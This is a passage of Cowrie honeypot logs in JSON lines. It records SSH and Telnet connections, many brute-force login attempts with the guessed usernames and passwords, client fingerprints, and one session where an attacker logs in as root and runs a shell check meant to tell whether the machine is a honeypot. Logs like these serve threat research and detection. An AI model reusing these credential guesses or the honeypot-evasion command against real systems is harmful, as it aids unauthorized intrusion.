{"eventid":"cowrie.login.failed","username":"admin","password":"29061992","message":"login attempt [admin/29061992] failed","sensor":"my-vps","timestamp":"2025-08-28T16:26:41.182946Z","src_ip":"212.227.125.160","session":"ce4bdc9e8cad"}
{"eventid":"cowrie.login.failed","username":"admin","password":"29051982","message":"login attempt [admin/29051982] failed","sensor":"my-vps","timestamp":"2025-08-28T16:26:42.244940Z","src_ip":"212.227.125.160","session":"ce4bdc9e8cad"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:26:43.307508Z","src_ip":"212.227.125.160","session":"ce4bdc9e8cad"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56490,"dst_ip":"1.2.3.4","dst_port":22,"session":"151c1e1f1dd3","protocol":"ssh","message":"New connection: 217.72.205.35:56490 (1.2.3.4:22) [session: 151c1e1f1dd3]","sensor":"my-vps","timestamp":"2025-08-28T16:27:10.962677Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:27:10.963899Z","src_ip":"217.72.205.35","session":"151c1e1f1dd3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33020,"dst_ip":"1.2.3.4","dst_port":22,"session":"05dc6a9d3003","protocol":"ssh","message":"New connection: 212.227.235.229:33020 (1.2.3.4:22) [session: 05dc6a9d3003]","sensor":"my-vps","timestamp":"2025-08-28T16:27:13.475863Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T16:27:13.477062Z","src_ip":"212.227.235.229","session":"05dc6a9d3003"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T16:27:13.573032Z","src_ip":"212.227.235.229","session":"05dc6a9d3003"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin@1","message":"login attempt [root/Admin@1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:27:13.961145Z","src_ip":"212.227.235.229","session":"05dc6a9d3003"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:27:14.176554Z","src_ip":"212.227.235.229","session":"05dc6a9d3003"}
{"eventid":"cowrie.command.input","input":"cpu=$(grep 'model name' /proc/cpuinfo 2>/dev/null || echo \"\"); memtotal=$(grep MemTotal /proc/meminfo 2>/dev/null || echo \"\"); if [ -z \"$cpu\" ] || [ -z \"$memtotal\" ]; then;   echo \"honeypot\"; else;   echo \"valid\"; fi","message":"CMD: cpu=$(grep 'model name' /proc/cpuinfo 2>/dev/null || echo \"\"); memtotal=$(grep MemTotal /proc/meminfo 2>/dev/null || echo \"\"); if [ -z \"$cpu\" ] || [ -z \"$memtotal\" ]; then;   echo \"honeypot\"; else;   echo \"valid\"; fi","sensor":"my-vps","timestamp":"2025-08-28T16:27:14.177568Z","src_ip":"212.227.235.229","session":"05dc6a9d3003"}
{"eventid":"cowrie.command.input","input":"grep model name /proc/cpuinfo 2 > /dev/null","message":"CMD: grep model name /proc/cpuinfo 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T16:27:14.178367Z","src_ip":"212.227.235.229","session":"05dc6a9d3003"}
{"eventid":"cowrie.command.input","input":"echo","message":"CMD: echo","sensor":"my-vps","timestamp":"2025-08-28T16:27:14.180420Z","src_ip":"212.227.235.229","session":"05dc6a9d3003"}
{"eventid":"cowrie.command.input","input":"grep MemTotal /proc/meminfo 2 > /dev/null","message":"CMD: grep MemTotal /proc/meminfo 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T16:27:14.181231Z","src_ip":"212.227.235.229","session":"05dc6a9d3003"}
{"eventid":"cowrie.command.input","input":"echo","message":"CMD: echo","sensor":"my-vps","timestamp":"2025-08-28T16:27:14.182317Z","src_ip":"212.227.235.229","session":"05dc6a9d3003"}
{"eventid":"cowrie.command.failed","input":"if [ -z ]","message":"Command not found: if [ -z ]","sensor":"my-vps","timestamp":"2025-08-28T16:27:14.183183Z","src_ip":"212.227.235.229","session":"05dc6a9d3003"}
{"eventid":"cowrie.command.failed","input":"[ -z ]","message":"Command not found: [ -z ]","sensor":"my-vps","timestamp":"2025-08-28T16:27:14.184295Z","src_ip":"212.227.235.229","session":"05dc6a9d3003"}
{"eventid":"cowrie.command.failed","input":"then","message":"Command not found: then","sensor":"my-vps","timestamp":"2025-08-28T16:27:14.185032Z","src_ip":"212.227.235.229","session":"05dc6a9d3003"}
{"eventid":"cowrie.command.failed","input":"else","message":"Command not found: else","sensor":"my-vps","timestamp":"2025-08-28T16:27:14.186059Z","src_ip":"212.227.235.229","session":"05dc6a9d3003"}
{"eventid":"cowrie.command.failed","input":"fi","message":"Command not found: fi","sensor":"my-vps","timestamp":"2025-08-28T16:27:14.187148Z","src_ip":"212.227.235.229","session":"05dc6a9d3003"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","shasum":"070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","destfile":"/dev/null","message":"Saved redir contents with SHA-256 070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac to var/lib/cowrie/downloads/070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","sensor":"my-vps","timestamp":"2025-08-28T16:27:14.285493Z","src_ip":"212.227.235.229","session":"05dc6a9d3003"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104","size":289,"shasum":"69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:27:14.286422Z","src_ip":"212.227.235.229","session":"05dc6a9d3003"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:27:14.288830Z","src_ip":"212.227.235.229","session":"05dc6a9d3003"}
{"eventid":"cowrie.session.connect","src_ip":"175.110.65.134","src_port":51017,"dst_ip":"1.2.3.4","dst_port":22,"session":"c23c7458ad7f","protocol":"ssh","message":"New connection: 175.110.65.134:51017 (1.2.3.4:22) [session: c23c7458ad7f]","sensor":"my-vps","timestamp":"2025-08-28T16:27:29.807304Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.0","message":"Remote SSH version: SSH-2.0-libssh2_1.11.0","sensor":"my-vps","timestamp":"2025-08-28T16:27:29.808486Z","src_ip":"175.110.65.134","session":"c23c7458ad7f"}
{"eventid":"cowrie.client.kex","hassh":"14b2ddda386a4d1006108ccd231b42fc","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-rsa-cert-v01@openssh.com","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 14b2ddda386a4d1006108ccd231b42fc","sensor":"my-vps","timestamp":"2025-08-28T16:27:29.833538Z","src_ip":"175.110.65.134","session":"c23c7458ad7f"}
{"eventid":"cowrie.login.failed","username":"spam","password":"spam","message":"login attempt [spam/spam] failed","sensor":"my-vps","timestamp":"2025-08-28T16:27:29.933662Z","src_ip":"175.110.65.134","session":"c23c7458ad7f"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:27:30.961008Z","src_ip":"175.110.65.134","session":"c23c7458ad7f"}
{"eventid":"cowrie.session.connect","src_ip":"123.31.39.100","src_port":55781,"dst_ip":"1.2.3.4","dst_port":23,"session":"5a0e2c27e6bb","protocol":"telnet","message":"New connection: 123.31.39.100:55781 (1.2.3.4:23) [session: 5a0e2c27e6bb]","sensor":"my-vps","timestamp":"2025-08-28T16:28:18.295786Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60128,"dst_ip":"1.2.3.4","dst_port":23,"session":"043944b97426","protocol":"telnet","message":"New connection: 212.227.125.160:60128 (1.2.3.4:23) [session: 043944b97426]","sensor":"my-vps","timestamp":"2025-08-28T16:28:19.377069Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60975,"dst_ip":"1.2.3.4","dst_port":23,"session":"d018284db6cf","protocol":"telnet","message":"New connection: 212.227.235.229:60975 (1.2.3.4:23) [session: d018284db6cf]","sensor":"my-vps","timestamp":"2025-08-28T16:28:20.435614Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55874,"dst_ip":"1.2.3.4","dst_port":23,"session":"d731c0ebeeb2","protocol":"telnet","message":"New connection: 212.227.235.229:55874 (1.2.3.4:23) [session: d731c0ebeeb2]","sensor":"my-vps","timestamp":"2025-08-28T16:28:20.451233Z"}
{"eventid":"cowrie.session.connect","src_ip":"123.31.39.100","src_port":38310,"dst_ip":"1.2.3.4","dst_port":23,"session":"2c49388ede13","protocol":"telnet","message":"New connection: 123.31.39.100:38310 (1.2.3.4:23) [session: 2c49388ede13]","sensor":"my-vps","timestamp":"2025-08-28T16:28:22.357742Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55790,"dst_ip":"1.2.3.4","dst_port":22,"session":"1bd06298619f","protocol":"ssh","message":"New connection: 212.227.125.160:55790 (1.2.3.4:22) [session: 1bd06298619f]","sensor":"my-vps","timestamp":"2025-08-28T16:28:41.067513Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:28:41.068677Z","src_ip":"212.227.125.160","session":"1bd06298619f"}
{"eventid":"cowrie.session.closed","duration":46.177391052246094,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:29:04.473109Z","src_ip":"123.31.39.100","session":"5a0e2c27e6bb"}
{"eventid":"cowrie.session.closed","duration":46.13847470283508,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:29:05.514358Z","src_ip":"212.227.125.160","session":"043944b97426"}
{"eventid":"cowrie.session.closed","duration":46.1116509437561,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:29:06.547169Z","src_ip":"212.227.235.229","session":"d018284db6cf"}
{"eventid":"cowrie.session.closed","duration":46.09697246551514,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:29:06.548136Z","src_ip":"212.227.235.229","session":"d731c0ebeeb2"}
{"eventid":"cowrie.session.closed","duration":46.1720027923584,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:29:08.529641Z","src_ip":"123.31.39.100","session":"2c49388ede13"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42972,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c12494b707b","protocol":"ssh","message":"New connection: 212.227.235.229:42972 (1.2.3.4:22) [session: 7c12494b707b]","sensor":"my-vps","timestamp":"2025-08-28T16:29:31.940983Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T16:29:31.942167Z","src_ip":"212.227.235.229","session":"7c12494b707b"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T16:29:32.041398Z","src_ip":"212.227.235.229","session":"7c12494b707b"}
{"eventid":"cowrie.login.failed","username":"loginuser","password":"123456","message":"login attempt [loginuser/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T16:29:32.341806Z","src_ip":"212.227.235.229","session":"7c12494b707b"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:29:33.444511Z","src_ip":"212.227.235.229","session":"7c12494b707b"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":23007,"dst_ip":"1.2.3.4","dst_port":22,"session":"9e5e93d5a292","protocol":"ssh","message":"New connection: 80.94.95.15:23007 (1.2.3.4:22) [session: 9e5e93d5a292]","sensor":"my-vps","timestamp":"2025-08-28T16:30:14.486508Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T16:30:14.512927Z","src_ip":"80.94.95.15","session":"9e5e93d5a292"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T16:30:14.563257Z","src_ip":"80.94.95.15","session":"9e5e93d5a292"}
{"eventid":"cowrie.login.failed","username":"admin","password":"vertex25","message":"login attempt [admin/vertex25] failed","sensor":"my-vps","timestamp":"2025-08-28T16:30:14.815344Z","src_ip":"80.94.95.15","session":"9e5e93d5a292"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin@2017","message":"login attempt [admin/admin@2017] failed","sensor":"my-vps","timestamp":"2025-08-28T16:30:15.869479Z","src_ip":"80.94.95.15","session":"9e5e93d5a292"}
{"eventid":"cowrie.login.failed","username":"admin","password":"Welcome@123","message":"login attempt [admin/Welcome@123] failed","sensor":"my-vps","timestamp":"2025-08-28T16:30:16.923516Z","src_ip":"80.94.95.15","session":"9e5e93d5a292"}
{"eventid":"cowrie.login.failed","username":"admin","password":"creative","message":"login attempt [admin/creative] failed","sensor":"my-vps","timestamp":"2025-08-28T16:30:17.983505Z","src_ip":"80.94.95.15","session":"9e5e93d5a292"}
{"eventid":"cowrie.login.failed","username":"admin","password":"bjk1903","message":"login attempt [admin/bjk1903] failed","sensor":"my-vps","timestamp":"2025-08-28T16:30:19.040275Z","src_ip":"80.94.95.15","session":"9e5e93d5a292"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:30:20.093722Z","src_ip":"80.94.95.15","session":"9e5e93d5a292"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52766,"dst_ip":"1.2.3.4","dst_port":23,"session":"a2fdca197ef5","protocol":"telnet","message":"New connection: 212.227.125.160:52766 (1.2.3.4:23) [session: a2fdca197ef5]","sensor":"my-vps","timestamp":"2025-08-28T16:30:41.844045Z"}
{"eventid":"cowrie.session.closed","duration":31.153629541397095,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:31:12.997580Z","src_ip":"212.227.125.160","session":"a2fdca197ef5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34154,"dst_ip":"1.2.3.4","dst_port":22,"session":"2bacb7137b13","protocol":"ssh","message":"New connection: 212.227.235.229:34154 (1.2.3.4:22) [session: 2bacb7137b13]","sensor":"my-vps","timestamp":"2025-08-28T16:31:29.157837Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T16:31:29.158780Z","src_ip":"212.227.235.229","session":"2bacb7137b13"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T16:31:29.263317Z","src_ip":"212.227.235.229","session":"2bacb7137b13"}
{"eventid":"cowrie.login.failed","username":"solv","password":"1234567890","message":"login attempt [solv/1234567890] failed","sensor":"my-vps","timestamp":"2025-08-28T16:31:29.579845Z","src_ip":"212.227.235.229","session":"2bacb7137b13"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:31:30.690071Z","src_ip":"212.227.235.229","session":"2bacb7137b13"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38710,"dst_ip":"1.2.3.4","dst_port":23,"session":"96f19b68d7f1","protocol":"telnet","message":"New connection: 212.227.235.229:38710 (1.2.3.4:23) [session: 96f19b68d7f1]","sensor":"my-vps","timestamp":"2025-08-28T16:32:42.652771Z"}
{"eventid":"cowrie.session.closed","duration":12.845372200012207,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:32:55.498087Z","src_ip":"212.227.235.229","session":"96f19b68d7f1"}
{"eventid":"cowrie.session.connect","src_ip":"47.245.101.105","src_port":55312,"dst_ip":"1.2.3.4","dst_port":23,"session":"0eed8b490009","protocol":"telnet","message":"New connection: 47.245.101.105:55312 (1.2.3.4:23) [session: 0eed8b490009]","sensor":"my-vps","timestamp":"2025-08-28T16:33:25.449720Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":63892,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f62a714fb65","protocol":"ssh","message":"New connection: 217.72.205.35:63892 (1.2.3.4:22) [session: 0f62a714fb65]","sensor":"my-vps","timestamp":"2025-08-28T16:33:40.732168Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:33:40.733307Z","src_ip":"217.72.205.35","session":"0f62a714fb65"}
{"eventid":"cowrie.session.closed","duration":30.722684383392334,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:33:56.172326Z","src_ip":"47.245.101.105","session":"0eed8b490009"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40257,"dst_ip":"1.2.3.4","dst_port":23,"session":"518b7027be3e","protocol":"telnet","message":"New connection: 212.227.235.229:40257 (1.2.3.4:23) [session: 518b7027be3e]","sensor":"my-vps","timestamp":"2025-08-28T16:34:02.452907Z"}
{"eventid":"cowrie.session.closed","duration":34.249568462371826,"message":"Connection lost after 34 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:34:36.702402Z","src_ip":"212.227.235.229","session":"518b7027be3e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":6100,"dst_ip":"1.2.3.4","dst_port":22,"session":"acc46f70585e","protocol":"ssh","message":"New connection: 212.227.125.160:6100 (1.2.3.4:22) [session: acc46f70585e]","sensor":"my-vps","timestamp":"2025-08-28T16:34:42.117054Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-08-28T16:34:42.188793Z","src_ip":"212.227.125.160","session":"acc46f70585e"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 